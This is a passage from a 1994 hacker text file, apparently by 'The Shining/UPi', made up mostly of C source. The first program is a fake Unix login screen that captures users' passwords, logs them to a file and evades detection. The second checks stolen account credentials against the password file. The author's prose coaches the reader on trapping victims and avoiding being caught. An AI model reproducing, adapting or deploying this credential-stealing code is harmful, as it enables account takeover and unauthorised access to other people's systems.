  992.        }
  993. }
  994.  
  995. /* If we have a valid account & password, get user info from the
  996.    pwfile & store it */
  997.  
  998.         if ( invalid == 0 ) {
  999.  
  1000.            u.comment = pwentry->pw_gecos;
  1001.             u.homedir = pwentry->pw_dir;
  1002.            u.shell = pwentry->pw_shell;
  1003.  
  1004.           /* Open file to store user info */
  1005.  
  1006.            if ((fp = fopen(OUTFILE, "a")) == NULL)
  1007.               log_out();
  1008.  
  1009.                write_details(&u);
  1010.                 fclose(fp);
  1011.                 no_message = 1;
  1012.                flag = 1;
  1013.         }
  1014.         else
  1015.            flag = 0;
  1016.  
  1017.         invalid_login();
  1018.  
  1019.     endpwent();                       /* Close pwfile */
  1020.  
  1021.     if (no_message == 0)
  1022.        loop_cnt++;
  1023.  
  1024.   }                                  /* end while */
  1025.  
  1026. log_out();                           /* call real login program */
  1027.  
  1028. }
  1029.  
  1030. /* Function to read user i.d. & password */
  1031.  
  1032. void get_info( void )
  1033. {
  1034.    char user[11];
  1035.    unsigned int string_len;
  1036.  
  1037.    fflush(stdin);
  1038.     prep_str(u.logname);
  1039.     prep_str(u.key);
  1040.    strcpy(user, "\n");
  1041.  
  1042. /* Loop while some loser keeps hitting return when asked for user
  1043.    i.d. and if someone hits CTRL-D to break out of spoof. Enter
  1044.    a # at login to exit spoof. Uncomment the appropriate line(s)
  1045.    below to customise the spoof to look like your system */
  1046.  
  1047.   while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
  1048.   {
  1049.    /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */
  1050.  
  1051.     if (loop_cnt > 0)
  1052.        strcpy(hname, "login: ");
  1053.  
  1054.       printf("%s", hname);
  1055.       fgets(user, 9, stdin);
  1056.  
  1057.    /* Back door for hacker, # at present, can be changed,
  1058.       but leave \n in. */
  1059.  
  1060.      if (strcmp(user, "#\n") == NULL)
  1061.          exit(0);
  1062.  
  1063.     /* Strip \n from login i.d. */
  1064.  
  1065.      if (strlen(user) < 8)
  1066.         string_len = strlen(user) - 1;
  1067.      else
  1068.         string_len = strlen(user);
  1069.  
  1070.      strncpy(u.logname, user, string_len);
  1071.  
  1072. /* check to see if CTRL-D has occurred because it does not
  1073.    generate an interrupt like CTRL-C, but instead generates
  1074.    an end-of-file on stdin */
  1075.  
  1076.      if (feof(stdin)) {
  1077.          clearerr(stdin);
  1078.         printf("\n");
  1079.      }
  1080.  
  1081.   }
  1082.  
  1083. /* Turn off screen display & read users password */
  1084.  
  1085.      strncpy(u.key, getpass("Password:"), 8);
  1086.  
  1087. }
  1088.  
  1089. /* Function to increment the timer which holds the amount of time
  1090.    the spoof has been running */
  1091.  
  1092. void catch( void )
  1093. {
  1094.   time_on++;
  1095.  
  1096. /* If spoof has been running for 15 minutes, and has not
  1097.    been used, stop timer and call spoof exit routine */
  1098.  
  1099. if ( time_out == 0 ) {
  1100.    if (time_on == 15) {
  1101.        printf("\n");
  1102.         alarm(0);
  1103.        log_out();
  1104.    }
  1105. }
  1106.  
  1107. /* 'Touch' your tty, effectively keeping terminal idle time to 0 */
  1108.  
  1109.  utime(tty, times);
  1110. alarm(50);
  1111. }
  1112.  
  1113. /* Initialise a string with \0's */
  1114.  
  1115. void prep_str( char str[] )
  1116. {
  1117. int strl, cnt;
  1118.  
  1119. strl = strlen(str);
  1120. for (cnt = 0; cnt != strl; cnt++)
  1121.     str[cnt] = ' ';
  1122. }
  1123.  
  1124. /* function to catch interrupts, CTRL-C & CTRL-Z etc as
  1125.    well as the timer signals */
  1126.  
  1127. void disable_interrupts( void )
  1128. {
  1129.    signal(SIGALRM, catch);
  1130.     signal(SIGQUIT, SIG_IGN);
  1131.      signal(SIGTERM, SIG_IGN);
  1132.     signal(SIGINT, SIG_IGN);
  1133.    signal(SIGTSTP, SIG_IGN);
  1134. }
  1135.  
  1136. /* Write the users i.d., password, personal information, homedir
  1137.    and shell to a file */
  1138.  
  1139. void write_details(struct loginfo *sptr)
  1140. {
  1141.  
  1142.    fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
  1143.     fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
  1144.      fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
  1145.     fprintf(fp, "%s\n", sptr->shell);
  1146.    fprintf(fp, "\n");
  1147. }
  1148.  
  1149. /* Display login incorrect only if the user hasn't logged on as
  1150.    'sync' */
  1151.  
  1152. void invalid_login( void )
  1153. {
  1154.  
  1155.          if ( flag == 1 && pwstat == 0 )
  1156.             sleep(wait);
  1157.  
  1158.          if ( no_message == 0 )
  1159.             printf("Login incorrect\n");
  1160. }
  1161.  
  1162. /* Displays appropriate message, exec's the real login program,
  1163.    this replaces the spoof & effectively logs spoof's account off.
  1164.    Note: this spoof must be exec'd from the shell to work */
  1165.  
  1166. void log_out( void )
  1167. {
  1168.   time_out = 1;
  1169.  
  1170.    if ( no_message == 1 ) {
  1171.         sleep(1);
  1172.        printf("Login incorrect\n");
  1173.    }
  1174.  
  1175.    execl(LOGPATH, "login", (char *)0);
  1176. }
  1177.  
  1178. ----------cut here-------------------------------------------------------
  1179.  
  1180. then delete the source, run it and wait for some sucker to login!.
  1181. If you do initially run this spoof from your account, I suggest you
  1182. remove it when you have grabbed someone's account and run it from theirs
  1183. from then on, this reduces your chances of being caught!
  1184.  
  1185.                       User i.d. & Password Validator
  1186.                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1187.  
  1188. Now if you are familiar with the unix Crack program, as I'm sure most of
  1189. you are ;-), or if you have used my spoof to grab some accounts,
  1190. this little program could be of some use. Say you have snagged
  1191. quit a few accounts, and a few weeks later you wanna see if they are still
  1192. alive, instead of logging onto them, then logging out again 20 or 30 times
  1193. which can take time, and could get the system admin looking your way, this
  1194. program will continuously ask you to enter a user i.d. & password, then
  1195. validate them both by actually using the appropriate entry in the password
  1196. file. All valid accounts are then stored along with other info from the
  1197. password file, in a data file. The program loops around until you stop it.
  1198.  
  1199. This works on all unshadowed unix systems, and, you guessed it!, shadowed
  1200. SUNOS systems.
  1201.  
  1202. If you run it on an unshadowed unix other than SUNOS, remove all references
  1203. to pwdauth(), along with the shadow password file checking routine,
  1204. if your on sysV, your shit outa luck! anyway, here goes :-
  1205.  
  1206. ---cut here---------------------------------------------------------------
  1207.  
  1208. /* Program   : To validate accounts & passwords on both
  1209.                shadowed & unshadowed unix systems.
  1210.    Author    : The Shining/UPi (UK Division)
  1211.    Date      : Released 12/4/94
  1212.    UNIX type : All unshadowed systems, and SUNOS shadowed systems */
  1213.  
  1214. #include
  1215. #include
  1216. #include
  1217.  
  1218. FILE *fp;
  1219.  
  1220. int pw_system( void ), shadowed( void ), unshadowed( void );
  1221. void write_info( void ), display_notice( void );
  1222.  
  1223. struct passwd *pwentry, *getpwnam();
  1224.  
  1225. struct user {
  1226.        char logname[10];
  1227.        char key[9];
  1228.        char salt[3];
  1229. } u;
  1230.  
  1231. char *getpass(), *pwdauth(), *crypt(), ans[2];
  1232. int invalid_user, stat;
  1233.  
  1234. int main( void )
  1235. {
  1236.  
  1237.  strcpy(ans, "y");
  1238.  
  1239.  while (strcmp(ans, "y") == NULL)
  1240.  {
  1241.    invalid_user = stat = 0;
  1242.     display_notice();
  1243.      printf("Enter login id:");
  1244.     scanf("%9s", u.logname);
  1245.    strcpy(u.key, getpass("Password:"));
  1246.  
  1247.  setpwent();
  1248.  
  1249.    if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL)
  1250.       invalid_user = 1;
  1251.    else
  1252.       strncpy(u.salt, pwentry->pw_passwd, 2);
  1253.  
  1254.  if (invalid_user != 1) {
  1255.  
  1256.    if ((stat = pw_system()) == 1) {
  1257.       if ((stat = unshadowed()) == NULL) {
  1258.            printf("Unshadowed valid account! - storing details\n");
  1259.           write_info();
  1260.       }
  1261.    }
  1262.    else
  1263.      if ((stat = shadowed()) == NULL) {
  1264.           printf("SUNOS Shadowed valid account! - storing details\n");
  1265.          write_info();
  1266.      }
  1267.      else
  1268.         invalid_user = 2;
  1269.  
  1270.  }
  1271.  
  1272.     if (invalid_user == 1)
  1273.        printf("User unknown/not found in password file\n");
  1274.  
  1275.     if (invalid_user == 2 )
  1276.        printf("Password invalid\n");
  1277.  
  1278.        printf("\n\nValidate another account?(y/n): ");
  1279.        scanf("%1s", ans);
  1280.  
  1281.  endpwent();
  1282.  }
  1283. }
  1284.  
  1285. /* Check to see if shadow password system is used, in SUNOS the field
  1286.    in /etc/passwd starts with a '#', if not, check to see if entry
  1287.    is 13 chars, if not shadow must be in use. */
  1288.  
  1289. int pw_system( void )
  1290. {
  1291.    if (strlen(pwentry->pw_passwd) != 13)
  1292.       return(0);
  1293.    else
  1294.       if (strcmp(u.salt, "##") == NULL)
  1295.          return(0);
  1296.       else
  1297.          return(1);
  1298. }
  1299.  
  1300. /* If system is unshadowed, get the 2 character salt from the password
  1301.    file, and use this to encrypt the password entered. This is then
  1302.    compared against the password file entry. */
  1303.  
  1304. int unshadowed( void )
  1305. {
  1306. if (pwentry->pw_passwd == crypt(u.key, u.salt))
  1307.    return(0);
  1308. else
  1309.    return(1);
  1310. }
  1311.  
  1312. /* If SUNOS shadowe system is used, use the pwdauth() function to validate
  1313.    the password stored in the /etc/security/passwd.adjunct file */
  1314.  
  1315. int shadowed( void )
  1316. {
  1317. int pwstat;
  1318.  
  1319. if (pwstat = pwdauth(u.logname, u.key) == NULL)
  1320.    return(0);
  1321. else
  1322.    return(1);
  1323. }
  1324.  
  1325. /* Praise myself!!!! */
  1326.  
  1327. void display_notice( void )
  1328. {
  1329. system("clear");
  1330.  printf("Unix Account login id & password validator.\n");
  1331.  printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n");
  1332. printf("(c)1994 The Shining\n\n\n\n");
  1333. }
  1334.  
  1335. /* Open a file called 'data' and store account i.d. & password along with
  1336.    other information retrieved from the password file */
  1337.  
  1338. void write_info( void )
  1339. {
  1340.  
  1341. /* Open a file & store account information from pwfile in it */
  1342.  
  1343. if ((fp = fopen("data", "a")) == NULL) {
  1344.      printf("error opening output file\n");
  1345.     exit(0);
  1346. }
  1347.  
  1348. fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid);
  1349.  fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos);
  1350.  fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell);
  1351. fclose(fp);
  1352. }
  1353.  
  1354. -----cut here------------------------------------------------------------------
  1355.  
  1356. The above programs will not compile under non-ansi C compilers without quite
  1357. a bit of modification. I have tested all these programs on SUNOS both
  1358. shadowed & unshadowed, though they should work on other systems with
  1359. little modification (except the shadow password cracker, which is SUNOS
  1360. shadow system specific).
  1361.  
  1362. Regards to the following guys :-
  1363.  
  1364. Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
  1365. the guys at United International Perverts(yo Dirty Mac & Jasper!)
  1366. and all I know.
  1367.  
  1368. (c) 1994 The Shining (The NORTH!, U.K.)
  1369.  
  1370. *******************************************************************************
  1371.  
  1372.